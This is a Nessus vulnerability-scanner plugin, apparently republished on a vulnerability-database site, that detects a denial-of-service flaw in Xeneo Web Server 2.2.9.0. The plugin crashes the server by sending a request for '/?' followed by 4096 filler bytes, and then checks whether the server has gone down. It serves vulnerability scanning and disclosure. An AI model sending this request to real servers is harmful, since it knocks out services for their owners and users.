| Source | Link |
|---|---|
| seclists | www.seclists.org/fulldisclosure/2003/Apr/350 |
#
# This script was written by BEKRAR Chaouki <[email protected]>
#
# Xeneo Web Server 2.2.9.0 Denial of Service
#
# http://www.k-otik.com/bugtraq/04.22.Xeneo.php
#
# From : "badpack3t" <[email protected]>
# To : [email protected]
# Subject : Xeneo Web Server 2.2.9.0 Denial Of Service Vulnerability
# Changes by Tenable:
# - Revised plugin title (6/27/09)
include("compat.inc");
if(description)
{
script_id(11545);
script_version ("1.16");
script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
script_name(english:"Xeneo Web Server 2.2.9.0 GET Request Remote Overflow DoS");
script_set_attribute(attribute:"synopsis", value:
"The remote web server is affected by a denial of service
vulnerability." );
script_set_attribute(attribute:"description", value:
"Requesting an overly long URL starting with a question mark (as in
'/?AAAAA[....]AAAA') crashes the remote Xeneo web server." );
script_set_attribute(attribute:"see_also", value:"https://seclists.org/fulldisclosure/2003/Apr/350");
script_set_attribute(attribute:"solution", value:
"Unknown at this time." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
script_set_attribute(attribute:"plugin_publication_date", value: "2003/04/23");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_summary(english:"Xeneo Web Server 2.2.9.0 DoS");
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 2003-2020 A.D.Consulting France");
script_family(english:"Web Servers");
script_dependencie("find_service1.nasl", "http_version.nasl");
script_require_ports("Services/www", 80);
script_require_keys("www/PHP");
exit(0);
}
#
# The script code starts here
#
include("global_settings.inc");
include("http_func.inc");
port = get_http_port(default:80, embedded:TRUE);
if (get_kb_item("Services/www/"+port+"/embedded")) exit(0);
if ( ! can_host_php(port:port) ) exit(0);
banner = get_http_banner(port:port);
if ( ! banner || "Xeneo/" >!< banner ) exit(0);
if(http_is_dead(port:port))exit(0);
soc = http_open_socket(port);
if(soc)
{
buffer = http_get(item:string("/?", crap(4096)), port:port);
send(socket:soc, data:buffer);
r = http_recv(socket:soc);
http_close_socket(soc);
if(http_is_dead(port:port))security_warning(port);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation